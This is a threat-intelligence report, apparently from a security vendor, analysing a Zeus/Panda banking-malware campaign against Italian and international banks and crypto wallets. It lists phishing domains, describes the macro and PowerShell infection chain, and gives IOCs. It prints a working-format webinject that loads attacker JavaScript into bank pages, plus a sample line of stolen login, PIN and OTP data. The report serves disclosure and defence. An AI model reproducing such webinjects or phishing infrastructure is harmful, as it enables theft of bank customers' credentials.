Banks and crypto wallets: unveiling a global malware campaign using Zeus/Panda

For the past weeks our Threat Intelligence team has been following an enxtesive campaign, possibly operated by the same group, targeting a large amount of financial institutions, cyptocurrency wallets and the occasional Google and Apple accounts. The attackers target their victims both with Phishing emails, typo-squatted domains and malicious attachments that eventually lead to the installation of Zeus/Panda banking malware. The group appears to be active since at least 2015 and it’s most likely related to several campaigns identified by the security community in the past 3 years.

Update 1

This article was originally written in June/2018 and slightly updated over time, we decided not to publish any detail due to the huge amount of sensitive data available and accessible on the drop zones. ReaQta alerted the financial institutions involved, the CERTS and the authorities of the countries involved in this attack. As of August 2018 the servers used to collect the data went finally down and today we believe there is no harm anymore in publishing the details.

Update 2

The C2 sitergenis[.]com used to serve Ursnif.

Campaign Infrastructure

We identified a consistent stream of suspicious emails on our customers that eventually led us to the infrastructure used in their campaigns. In particular we focused our analysis on 2 campaigns, for reasons of longevity and volumes involved.

The first part of the infrastructure that caught our attention has been up since 2015, followed by a sleeping period terminated in February 2018; in the span of just 3 months over 24.000 sessions have been stolen from the respective victims. Despite the large amount of activity, the involved C2 went largely unnoticed for the past years, below is a report from VT regarding the domain used.

C2 front scan results

The following is an analysis of the data collected by the attackers starting from 2015 until the last days of May 2018, showing the large volume of transactions captured by the attackers.

Zeus/Panda First campaign identified

There’s a number of financial entities involved, in what appears to be a campaign focused on Italy (but don’t worry, it will get international in a moment). The servicelogin tag is a service shared by different financial institutions, large and small, in this case it represents an aggregate of sessions captured from victims belonging to these different entities.

First Campaign Entities Involved

The second part of the infrastructure has been active for almost a year, with the first signs of victim activities starting already in July 2017, in this case the URL appears completely clean with no public detections identified.

C2 front scan results for second domain

The activity on this server is considerable, with a large focus on Italian financial customers, both on Personal and Business accounts.

Zeus/Panda Second Campaign Identified

Below we can see which Banks have been affected and the numbers involved.

Second Campaign Entities Involved

The victims we have been able to identify belong to the following financial institutions and related service providers:

  • Allianz Bank
  • Banca CR Firenze
  • Banca CR Veneto
  • Banca Fideuram
  • Banca Intermobiliare
  • Banca Popolare di Milano (BPM)
  • Banca Popolare di Sondrio
  • Banca Sella
  • Banca delle Marche
  • Banca dell’Adriatico
  • Banca di Credito Popolare
  • Banco di Napoli
  • Bancoposta (Poste Italiane)
  • BNL (Paribas group)
  • BPER Group
  • Cedacri
  • Consorzio Servizi Bancari (CSE)
  • Credito Emiliano (Credem)
  • Deutsche Bank Italia
  • Fineco Bank
  • Gruppo Carige
  • Intesa San Paolo
  • Monte dei Paschi di Siena (MPS)
  • Nexi ICBPI
  • Relax Banking
  • Tecmarket
  • UBI Banca
  • Unicredit

As we mentioned above, though this campaign is aimed at the Italian market it doesn’t remain on those grounds, in fact the same infrastructure is used and it’s still active on hundreds of different domains, related to international banks, cryptocurrency wallets and also various typo-squatted/fake domains related to Apple and Google. In particular the front IP used for the first campaign also carries (or used to) the following domain names:

  • 2018-06-09 power-gt.com
  • 2018-06-09 www.gegirtan.com
  • 2018-06-09 gegirtan.com
  • 2018-06-08 www.polessdo.com
  • 2018-06-08 polessdo.com
  • 2018-06-05 verificaiton-stamp-online.com
  • 2018-06-05 lloyds-online-banking.verificaiton-stamp-online.com
  • 2018-06-05 www.lloyds-online-banking.verificaiton-stamp-online.com
  • 2018-06-05 www.cibconline.cibc.com.ebm-anp.com
  • 2018-06-05 cibconline.cibc.com.ebm-anp.com
  • 2018-06-03 waser.ml
  • 2018-05-29 bdv4cc9rub.net
  • 2018-05-29 www.bdv4cc9rub.net
  • 2018-05-24 www.sobentera.com
  • 2018-05-24 sobentera.com
  • 2018-05-24 disbanist.com
  • 2018-05-24 www.disbanist.com
  • 2018-05-23 procrd.pro
  • 2018-05-23 www.procrd.pro
  • 2018-05-22 www.metrobanakonlline.com
  • 2018-05-22 metrobanakonlline.com
  • 2018-05-21 www.ielectrum.info
  • 2018-05-21 ielectrum.info
  • 2018-05-21 lelectrum.com
  • 2018-05-21 www.lelectrum.com
  • 2018-05-19 www.sucursalvirtualpersonas.at
  • 2018-05-19 sucursalvirtualpersonas.at
  • 2018-05-19 www.sucursalesvirtuales.at
  • 2018-05-19 sucursalesvirtuales.at
  • 2018-05-19 www.aanvraag-ing.nl
  • 2018-05-19 aanvraag-ing.nl
  • 2018-05-19 iban-marktplaats.nl
  • 2018-05-19 www.iban-marktplaats.nl
  • 2018-05-19 www.iban-abnamro.nl
  • 2018-05-19 iban-abnamro.nl
  • 2018-05-19 www.iban-rabobank.nl
  • 2018-05-19 iban-rabobank.nl
  • 2018-05-19 iban-ing.nl
  • 2018-05-19 www.iban-ing.nl
  • 2018-05-13 www.nodertoma.top
  • 2018-05-12 abnamto.com
  • 2018-05-12 www.ukogono.top
  • 2018-05-12 ukogono.top
  • 2018-05-08 waser.ml
  • 2018-05-06 www.conishiret.com
  • 2018-05-06 conishiret.com
  • 2018-05-06 www.minotaris.com
  • 2018-05-06 minotaris.com
  • 2018-05-04 www.blochhain.com
  • 2018-05-04 blochhain.com
  • 2018-05-04 www.maferdola.top
  • 2018-05-04 maferdola.top
  • 2018-05-03 www.sitergenis.com
  • 2018-05-03 sitergenis.com
  • 2018-05-02 magentotoolset.com
  • 2018-05-02 www.magentotoolset.com
  • 2018-05-01 www.blockchaiw.info
  • 2018-05-01 blockchaiw.info
  • 2018-04-29 www.abnamto.com
  • 2018-04-25 free-etherwallet.com
  • 2018-04-25 www.free-etherwallet.com
  • 2018-04-24 www.american-express24.com
  • 2018-04-24 american-express24.com
  • 2018-04-24 www.worontau.top
  • 2018-04-24 worontau.top
  • 2018-04-24 american-express.site
  • 2018-04-24 www.american-express.site
  • 2018-04-24 staticball.com
  • 2018-04-24 www.staticball.com
  • 2018-04-23 applessl.info
  • 2018-04-23 www.applessl.info
  • 2018-04-22 colobinar.com
  • 2018-04-22 www.colobinar.com
  • 2018-04-22 www.polinodara.com
  • 2018-04-22 polinodara.com
  • 2018-04-19 power-gt.com
  • 2018-04-19 mail30.power-gt.com
  • 2018-04-19 www.gorevoin.com
  • 2018-04-19 gorevoin.com
  • 2018-04-18 mijning-ssl.info
  • 2018-04-18 www.mijning-ssl.info
  • 2018-04-16 www.prosalesservice.com
  • 2018-04-16 prosalesservice.com
  • 2018-04-15 www.ppnl.info
  • 2018-04-15 ppnl.info
  • 2018-04-13 www.mijning-ssl.nl
  • 2018-04-13 mijning-ssl.nl
  • 2018-04-13 mongovaca.win
  • 2018-04-13 www.mongovaca.win
  • 2015-11-28 adobeflashupdater.net

The attackers are currently targeting various financial entities worldwide: American Express, LLoyds bank, ABN Amro, ING, Rabobank. Below is a phishing page currently active on LLoyd’s Bank:

LLoyds bank phishing page
Phishing page active at the time of writing.

The campaign scope is not limited to financial institutions but it also includes cryptocurrency wallets, below is a comparison of the legitimate Electrum website vs the phishing version.

Electrum phishing page
Phishing Electrum page with an added login box
Electrum real page
Real Electrum page

What’s interesting is that one of the first domain names pointing to the front IP address back in November 2015 was adobeflashupdater.net and upon further digging, that domain appeared to be (surprise!) part of a more recent phishing campaign; the related host was used to impersonate mostly Apple, Google and for some reason a Clinton related domain as shown below:

  • imap.maill.clintonemailhearing.com
  • imap.em.gmailssdf.com
  • icloudip-itunes.com
  • apple-ltunes-ios.com
  • apple-activated.com
  • google-cloud.pw
  • apple-ituens.com
  • apple-ins-server-icloud.com
  • apple-inc-server-icloud.com
  • appleid-find-usa.com
  • gov.0.56v.us (this has been used has base domain for a DNG algorithm used in a different campaign)

Of course the list is not final, as the new samples of Zeus/Panda we are gathering are targeting new entities and a new branch of the campaign is currently attacking banks in Nothern & East Europe, Asia and Australia.

Zeus/Panda New Campaign

Zeus/Panda Infection

Users that are directly attacked receive an email with an Office document containing a malicious macro.

Zeus/Panda Banker Phishing Attachment

The macro takes advantage of Powershell to download and run the executable Zeus/Panda file from one of the hosting domains, below is a screenshot of the first stage taken from ReaQta-Hive showing the cmd.exe spawning from Excel and the related Powershell script used in the document:

Zeus/Panda Office Infection - First Stage
Office Infection – First Stage

After the download Zeus/Panda is executed (we split the incident in two parts for easier reading), it performs an injection into svchost.exe, establishes registry persistence, downloads an encrypted VNC client and then begins its job of adding webinjects to the pages visited by the victim.

Zeus/Panda Office Infection - Second Stage
Office Infection – Second Stage

The webinjects are created both for Financial accounts and for email accounts while links to the support sections, security and reporting are blocked. Webinjects follow a well-known format for Zeus/Panda and they look like this:

Replace = https://www.<REDACTED>.it/it/*.html
Encoding = utf-8
Subject = <title><REDACTED>
Replacement = <script id="xks11" type="text/javascript" src="https://<REDACTED>/it/js.php?system=<REDACTED>&[email protected]@"></script> <script id="xks12"> document.getElementById("xks11").parentNode.removeChild(document.getElementById("xks1
1")); </script><title>UniCredit

The data that is exfiltrated is related of course to the username/password combination and also to the OTP PIN used during the login:

151.xx.xx.xx |victim_user| 12:04:14 02.06.2018 | Bank: <REDACTED> | User:victim_user;PIN:12345;OTP:0000^https://www.<REDACTED>.com/

Unfortunately changing password won’t help the victims until their systems are cleaned from the malware and from the running VNC client.

IOCs

  • 58af96fb4c4f551fc9b8eb4890eab0144221ca976286f928d5bed696945f705e
  • 28e8f8d150a877e765282b8f4a8e6979128264bd826853c1e896815a4543d619
  • gemendoloma.top
  • freeflysky.tk
  • conectlo.qt
  • sitergenis.com
  • vigerentis.com
  • guardnet.review
  • elementaleios.win
  • elementalelib.space
  • cloudflore.cc
  • clickara.com (VNC clients downloaded from here)
  • 85.204.74.107
  • 95.181.178.216
  • 95.141.36.106
  • 89.18.27.143
  • 89.18.27.221

Conclusions

The actors behind these campaigns are constantly active and capable of adapting extremely quickly. The amount of entities targeted, the difference in languages and the scope suggest the presence of a large and well-structured group taking care of the different aspects of the operations. During our analysis we identified different entry points in Poland, Russia and China, directly operated by the group, this might be an indication of different actors taking parts in the same game (possibly also a merging of different criminal groups?) from various countries. Whatever the case users should be alert as usual and be wary of unexpected documents as they might contain malicious code capable of extracting personal and financial information from the affected devices.